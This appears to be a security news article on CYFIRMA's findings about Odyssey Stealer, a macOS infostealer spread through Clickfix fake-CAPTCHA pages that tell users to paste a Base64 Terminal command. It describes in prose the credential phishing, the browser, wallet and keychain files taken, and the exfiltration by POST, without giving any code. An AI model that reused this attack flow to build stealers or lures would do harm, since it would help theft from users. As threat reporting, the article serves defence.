Clickfix Technique Powers New Odyssey Malware to Harvest Browser Cookies, Passwords, and Wallet Data

The CYFIRMA research team has uncovered a new wave of cyberattacks targeting macOS users, leveraging the recently rebranded Odyssey Stealer malware.

This sophisticated threat employs the “Clickfix” technique, an increasingly popular deception strategy involving typosquatted or visually mimicked domains, to deliver malicious AppleScripts (osascripts) that siphon browser cookies, saved passwords, cryptocurrency wallet data, and sensitive personal files.

The Clickfix Technique

Cybercriminals behind the Odyssey Stealer create typosquatting domains that resemble major financial institutions, the Apple App Store, and cryptocurrency news platforms.

When users mistakenly visit these sites, they’re confronted by a fake Cloudflare-style CAPTCHA. macOS visitors are prompted to copy and paste a Base64-encoded command into their Terminal, supposedly to “verify they’re not a robot”.

This command initiates a direct fetch-and-execute action from attacker-controlled infrastructure, specifically, the Odyssey Stealer’s command-and-control (C2) servers.

Upon execution, the malware proceeds to run an AppleScript that displays a deceptive password prompt, designed to capture the user’s system credentials silently.

It then validates these credentials in the background using native macOS tools to remain undetected.

The script creates a temporary directory, notably /tmp/lovemrtrump, where it amasses browser cookies, macOS keychain files, and wallet data before compressing them for exfiltration.

Comprehensive Data Theft: Browsers, Wallets, and More

Odyssey Stealer demonstrates a wide-ranging reach across popular browsers and cryptocurrency wallets.

It raids Chrome, Brave, Edge, Opera, and Firefox for login credentials, payment information, session cookies, and cryptocurrency extension data (such as MetaMask wallet seeds and private keys).

For Firefox, it targets “logins.json” and decrypts passwords using “key4.db”. Safari users aren’t spared—cookies, autofill records, and histories are all targeted.

The malware also searches for desktop wallet files from apps like Electrum, Exodus, and Coinomi, alongside files from familiar password managers (.kdbx format) and personal documents (.txt, .pdf, .docx, .jpg, .kdbx).

All stolen information is compressed into a ZIP archive and sent via repeated POST requests to the attacker’s servers, with persistent reconnection attempts if uploads fail.

Command and Control: Professional Malware Management

Odyssey Stealer’s backend panel showcases features for attackers: dashboards to monitor infections, builders for malware customization, bot management, and the ability to restore stolen Google cookies for session hijacking.

Most identified panels appear hosted in Russia, with the operation actively avoiding targets in CIS countries a hallmark of many Russian cybercrime groups.

Odyssey Stealer, evolved from Poseidon and AMOS, represents the cutting edge of Mac-focused info-stealers.

It is distributed via convincing fake websites and wields a potent suite of credential, wallet, and data theft tools, clearly focusing on Western finance and cryptocurrency communities.

Users are strongly advised to install only trusted software, block unnecessary scripting tools, and maintain vigilant endpoint and network security to counter this emerging threat.

Indicators of Compromise